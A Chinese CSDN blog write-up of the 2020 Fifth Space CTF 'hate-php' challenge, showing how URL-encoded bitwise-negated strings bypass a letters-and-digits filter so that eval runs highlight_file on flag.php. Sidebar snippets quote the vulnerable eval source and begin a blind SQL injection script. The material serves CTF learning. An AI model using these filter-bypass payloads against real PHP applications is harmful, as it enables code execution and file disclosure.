2020第五空间 hate-php rosb 交流

最新推荐文章于 2024-06-29 20:11:23 发布
最新推荐文章于 2024-06-29 20:11:23 发布
阅读量2.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Rashu99/article/details/106970461
版权
本文探讨了如何通过取反方法绕过PHP中对字母和数字的过滤策略,以及利用在线PHP运行环境进行打印目录操作。同时,文章提及了在ROSBCrypto中遇到的RSA共模攻击问题,分析了相关WP并尝试用Python3.8实现,但遇到了报错。
摘要由CSDN通过智能技术生成

hate-php

在这里插入图片描述
在这里插入图片描述

取反绕过对字母和数字的过滤

php在线运行

<?php
echo urlencode(~'highlight_file');  //%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A
echo "\n";
echo urlencode(~'flag.php'); //%99%93%9E%98%D1%8F%97%8F
?>

/?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%93%9E%98%D1%8F%97%8F)

在这里插入图片描述
另一种方法
参考
echo urlencode(~'print_r'); 取反得到编码
地址栏输入的时候再次取反让服务器解析得到 print_r

最低0.47元/天 解锁文章
Rashu99
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第五空间 hate_php
weixin_53955759的博客
09-30 1649
打开环境源码如下 正则匹配过滤了flag . p h / ; " ' ` | [ ] _ 绕过正则匹配的方法可以用两次取反urlencode编码来绕过它 看了wp,在php7以后可以用($a)();来执行函数 它会先执行($a)里面的函数,之后在执行();里的函数 那么就用highlight_file来返回flag.php的内容 ...
[RoarCTF 2019]Easy Calc
weixin_42346836的博客
10-16 417
查看源码发现有一个页面,直接访问 源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklis
-Web-hate_php
最新发布
2301_80113257的博客
06-29 183
代码审计后,发现对输入code进行了正则表达式匹配,过滤了英文大小写字母、数字和_$@三个特殊字符。本题的关键就是绕过正则匹配,执行eval()函数。读取到源码发现存在如下函数(我没找到?最后直接读取flag文件。
【CTFhub】——hate_php2021
manerzi的博客
11-02 1296
【CTFhub】——hate_php2021
ctfhub hate_php
m0_57954651的博客
11-15 370
闭合前面的php 同时执行我们后面构造想要执行的内容。首先进行了一个正则匹配 过滤掉了A~Z的26个字母大写 a ~ z的26个字母小写 0 ~9这十个数字。preg_match函数。我们需要构造语句绕过。
CTFHUB web-hate_php
m0_57954651的博客
09-05 1498
打开题目 一篇代码 先进行代码审计 看到PHP正则表达式 preg_match 显然在传参时 它会进行过滤 过滤后面括号中的关键字和特殊符号 第二个正则表达式也会过滤PHP的内置函数 即使我们找到了某个函数恰好可以绕过第一个 但也过不去第二个过滤 函数 get_defined_functions 所以这里我们利用异或或者取反来绕过 一般flag文件都会存放在根目录下 但是这里我们知道在哪 所以尝试一下 使用print_r函数 进行目录扫描 利用在线
Ethos-Hate-Speech-Dataset:该存储库包含用于社交媒体平台上的仇恨语音检测的数据集
05-23
ETHOS仇恨语音数据集 ETHOS:仅可用于检测数据集。 该存储库包含用于在社交媒体平台上称为Ethos的仇恨语音检测的数据集。 数据集有两种变体: Ethos_Dataset_Binary.csv [Ethos_Dataset_Binary.csv]在数据集中包含...
NLP---Hate-Speech
03-29
5. **模型训练与评估**:使用交叉验证(cross-validation)来评估模型性能,常见的评估指标有准确率(accuracy)、精确率(precision)、召回率(recall)和F1分数。 6. **混淆矩阵**:用于可视化模型分类结果,...
korean-hate-speech-detection
04-14
在数字化时代,网络成为了人们交流的主要平台,但也滋生了各种问题,其中包括仇恨语音。面对这一社会现象,数据科学家和机器学习专家们开始利用技术手段来识别和抵制仇恨语音。"korean-hate-speech-detection"项目...
【CTFHub】hate_php 2020 函数绕过
manerzi的博客
11-03 796
【CTFHub】hate_php 2020 函数绕过
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php
weixin_40872714的博客
03-29 2546
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php 打开网址直接告诉你过滤的代码,把字母数字和$、_、@都过滤了,直接放弃 然后百度搜了这道题的答案,感觉发现了新大陆一样,下面是相关的几篇文章,强烈推荐阅读: 过滤了大写字母和数字的绕过方法: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 过滤了大小写字母、数字、‘$’和‘_’ https://www.leavesongs.co
PHP基础
Hate Bugs
04-10 330
输出格式xml风格(这是PHP推荐使用的标记风格。)<?php echo '<p> xml output style'; ?>简短风格<? echo '<p>short output style</p>'; ?>SCRIPT风格<script language='php'> echo '<p>Script output style</p>';</script>ASP风格<% echo '<p>Asp
PHP intval()函数详解,intval()函数漏洞原理及绕过思路
热门推荐
wangyuxiang946的博客
06-17 2万+
intval() 函数可以获取变量的「整数值」。常用于强制类型转换。 进制自动转换 转换数组 转换小数 转换字符串 取反~ 算数运算符 浮点数精度缺失问题 intval()绕过思路
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 6321
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
第五空间智能安全大赛】web hate-php
weixin_45844670的博客
09-13 738
进入题目链接 得到源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
CTFHUB历年真题练习
qq_51558360的博客
10-11 1412
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
津门杯wp
qq_53755216的博客
06-06 259
hate_php <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 一道命令执行题目
love&hate unity
09-27
爱是一种深情的感情。它让我们感到温暖、幸福和满足。爱有许多不同的形式,包括亲情、友情和爱情。 亲情是最早出现的一种爱,是亲人之间的联系和情感。父母对子女的深爱,让他们愿意为他们付出一切。子女们也从小就开始爱和依赖父母,他们是我们生命中最重要的支持者和伴侣。 友情是一种非常特别的爱,是有着相似兴趣、互相尊重和信任的人之间发展的感情。朋友们相互扶持,分享彼此的快乐和悲伤。友情可以持久,即使经历了许多岁月和距离的考验。 而爱情则是最激情和浪漫的一种爱。它超越了亲情和友情,是男女之间的感情。爱情让我们陷入热恋和激烈的情感中。当我们爱上某人时,我们渴望和他们在一起,并愿意为他们做任何事情。爱情是令人兴奋和令人心碎的,但它也是生命中最美妙的经历之一。 爱是一个复杂的情感,并且可以在人与人之间以许多不同的方式表达出来。无论是亲情、友情还是爱情,它们都给我们带来了喜悦和满足感。爱是人类最基本的需求之一,它可以给我们力量和鼓励,同时也让我们变得更温暖、关怀和包容。让我们珍惜和传递爱,使世界变得更美好。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值